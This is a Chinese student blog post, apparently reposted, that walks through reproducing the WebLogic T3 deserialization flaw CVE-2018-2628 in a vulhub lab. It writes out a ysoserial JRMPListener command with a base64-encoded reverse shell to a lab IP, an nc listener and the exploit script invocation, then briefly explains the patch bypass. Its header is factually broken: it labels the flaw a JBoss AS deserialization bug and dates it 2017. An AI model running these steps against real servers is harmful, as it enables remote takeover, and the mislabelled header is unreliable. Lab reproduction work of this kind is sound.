java rmi漏洞工具_学生会私房菜【20200924】Weblogic WLS核心组件反序列化命令执行突破(CVE20182628)漏洞复现...
学生会私房菜
学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题。
本期文档内容为:Weblogic WLS核心组件反序列化命令执行突破(CVE-2018-2628)漏洞复现》
作者介绍:Chow
Chow,一个行走的“十万个为什么”,喜欢学自己兴趣所向的知识,虽然现在还是个弱鸡,但是学就完事啦!
一、基本信息
一. 基本概要
发布时间:2017年11月22日
漏洞名称:JBOSSAS5.x/6.x反序列化命令执行漏洞
威胁类型:远程命令执行
CVE编号:CVE-2018-2628
影响版本:Weblogic 10.3.6.0、Weblogic 12.1.3.0、Weblogic 12.2.1.2、Weblogic 12.2.1.3
漏洞描述:CVE-2018-2628为CVE-2017-3248修复版本的绕过,远程攻击者可利用该漏洞在未授权的情况下发送攻击数据,并可获取目标系统所有权限。
二、基本环境和工具
1. 靶机环境:
靶机操作系统:Ubuntu
漏洞环境:https://vulhub.org/#/environments/weblogic/CVE-2018-2628/
下载:https://vulhub.org/#/docs/install-docker-one-click/
使用说明:
执行以下命令启动Weblogic 10.3.6.0:
cd vulhub/weblogic/CVE-2018-2628
docker-compose up -d
访问访问http://your-ip:7001/console,初始化整个环境。
2. 操作机环境:
操作操作系统:Kail
检测和发现工具
工具名称:CVE-2018-2628-MultiThreading
工具安装:下载.py文件即可
工具使用说明:2-操作机批量检测脚本CVE-2018-2628-MultiThreading使用说明.doc
工具下载地址:https://github.com/aedoo/CVE-2018-2628-MultiThreading
3、EXP/利用工具
工具名称:44553
工具安装:下载.py文件即可
使用说明:参阅漏洞利用步骤即可
下载地址:https://www.exploit-db.com/exploits/44553
需要配合ysoserial
ysoserial(下载地址:https://github.com/brianwrf/ysoserial/releases/tag/0.0.6-pri-beta)
三、利用过程
(详细说明漏洞的利用过程,要求以拿到webshell权限为利用过程)
1. 利用的条件/漏洞特征
利用Kail下的nmap工具,检测weblogic版本信息和t3协议是否开启。
2. 漏洞利用步骤:
步骤1 开启监听服务JRMPListen
本地开启监听服务JRMPListen,利用ysoserial的JRMP对998端口监听
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
#[command]即为想执行的命令,而[listen port]是JRMP Server监听的端口。
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 998 CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2MC4xMjkvNjc2NyAwPiYx}|{base64,-d}|{bash,-i}" #引号内为反弹shell到192.168.160.129 6767端口经过base64加密后的指令
步骤2 新开一个终端,监听反弹shell的端口
nc -lvp 6767
步骤3 利用exploit脚本攻击
命令:python exploit.py [目标ip] [目标port] [ysoserial路径] [JRMPListener ip] [JRMPListener port] [JRMPClient]
#目标ip就是weblogic的ip。端口weblogic的端口
#ysoserial路径就是上方使用的ysoserial的路径
#JRMPListener port为主机端口,就是我使用的Kail,监听端口上方998
#JRMPClient命令执行。[JRMPClient]是执行JRMPClient的类,可选的值是JRMPClient或JRMPClient2
python CVE-2018-2628exploit.py 192.168.160.134 7001 ysoserial-0.0.6-SNAPSHOT-all.jar 192.168.160.129 998 JRMPClient
步骤4 成功反弹shell
四、原理分析
CVE-2018-2628原理为在CVE-2017-3248补丁中用黑名单的方式在weblogic.rjvm.InboundMsgAbbrev$ServerChannelInputStream.class多了一个resolveProxyClass处理rmi接口类型,这个resolveProxyClass只对 java.rmi.registry.Registry接口进行了判断,找一个其他的rmi接口即可绕过,比如java.rmi.activation.Activator。
国科学院学生会是由国科学院指导开展的学员服务型组织,致力于配合国科学院完成日常工作的开展以及强化锻炼学员的自身职业素养与专业技能,下设部门有技术部和综合部。
如果你们也想提升自我,又或者是想认识这些和你们一样优秀的小伙伴,那就赶快联系指导老师并加入我们吧!
学生会信箱:
student@goktech.cn
【往期精彩内容】
国科学院学生会的“小确幸”瓶子,你能涂满几个?
学生会私房菜【202008011期】《Apache Shiro 1.2.4反序列化漏洞》
学生会私房菜【20200804期】String详解
学生会私房菜【20200723期】S2-045 Remote Code Execution漏洞利用
聚资讯,融技术,访精英▏【学生会信箱】开通啦!
讲师预备生唐欢——加入国科遇见更优秀的自己
王少怀
国科学院(厦门基地)学生会指导老师
王阳
国科学院(泉州基地)学生会指导老师
王建
国科学院(福州基地)学生会指导老师
曹博文
国科学院(成都基地)学生会指导老师
java rmi漏洞工具_学生会私房菜【20200924】Weblogic WLS核心组件反序列化命令执行突破(CVE20182628)漏洞复现...相关推荐
- ping ip 端口_学生会私房菜【20200305期】——Ping命令及其常用参数详解
一命令原理 Ping是ICMP的一个典型应用.Ping是检测网络连通的常用工具,同时也能收集其他相关信息.用户可以在Ping命令中指定不同参数,如ICMP报文长度.发送的ICMP报文个数.等待回复响应 ...
- 漏洞payload 靶机_学生会私房菜【20200707期】Wordpress 4.6 任意命令执行漏洞
学生会私房菜 学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题. 本期文档内容为:<Wordpress 4.6 任意命令执行漏洞> 作者介绍:AT ...
- Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现 kali docker
Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现 漏洞环境搭建 漏洞复现 反弹shell 题外话1 题外话2 影响版本:Apache Shiro <= 1.2.4 漏洞产生 ...
- 【Vulhub】Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)
脚本小子上线啦,开始复现以前出现实战环境的漏洞了,我会记录一些复现的漏洞(不会是全部),今天这个漏洞的原理我也不太会就知道是个Java反序列化的洞,只负责复现(脚本小子~). 漏洞介绍&环境搭 ...
- 【vulhub】Apereo CAS 4.1 反序列化命令执行漏洞复现
楼主困了,这里就直接写上楼主自己的一些操作 详细过程可以看Apereo CAS 4.1 反序列化命令执行漏洞复现 特征: 1.网站根目录下有cas目录 2.如图所示,有apereo CAS图标 3.如 ...
- 03 - vulhub - Apereo CAS 4.1 反序列化命令执行漏洞
文章目录 漏洞名称:Apereo CAS 4.1 反序列化命令执行漏洞 影响版本 漏洞原理 漏洞复现 环境准备 漏洞检测 漏洞利用 验证漏洞利用是否成功 修复建议 漏洞名称:Apereo CAS 4. ...
- wpf window 不执行show 就不能load执行_Numpy反序列化命令执行漏洞分析(CVE-2019-6446)附0day...
1.介绍 NumPy 是 Python 机器学习库中之一,主要对于多为数组执行计算.NumPy 提供大量的 函数和操作,能够帮助程序员便利进行数值计算.在 NumPy 1.16.0 版本之前存在反序列 ...
- python pickle反序列化漏洞_Numpy反序列化命令执行漏洞分析(CVE-2019-6446) –vr_system...
1. 介绍 NumPy 是 Python 机器学习库中之一,主要对于多为数组执行计算.NumPy提供大量的函数和操作,能够帮助 程序员 便利进行数值计算.在NumPy 1.16.0版本之前存在反序列化 ...
- cmd打开nmap_诸神之眼:Nmap端口扫描工具使用小手册——学生会私房菜【20190524期】...
菜系:安全技术分享 主厨:国科(福州)学生会教学部--王荣昌.李志超 1 Nmap介绍 1.1 Nmap 简介 1) Nmap ("Network Mapper(网络映射器)") ...
最新文章
- Java 基础------16进制转2进制
- Windows Server 2016-Powershell迁移FSMO角色
- 决策树python建模中的坑 :ValueError: Expected 2D array, got 1D array instead:
- php读取pdf文件
- AIX逻辑卷管理(LVM)
- python输入日期时间转换格式_python如何格式化日期?
- 【英语学习】【Daily English】U09 Fashion L03 You're my fashion icon
- JavaEE基础(十七)/集合
- [转]6个开源数据科学项目
- android活动中的变量,在不同的活动中保持变量值Android Studio
- 能不能做好性能测试,要看你有没有性能测试思维
- 【mysql优化 2】索引条件下推优化
- 计算机体系结构和计算机组成哪个重要,计算机组成和体系结构教学初探.doc
- 对python生成的EXE文件 进行反编译
- 宗地图绘制要求和规范_宗地图绘制的基本要求与内容.ppt
- 使用Unicode字符集出现乱码问题
- 华中农大计算机排名,华中农业大学专业排名,招生专业目录(10篇)
- delete操作对UNDO表空间容量的冲击
- 第049篇:VBA之合并单元格、取消合并单元格并保留原来的数据
- java 生成电子合同_java实现电子合同签名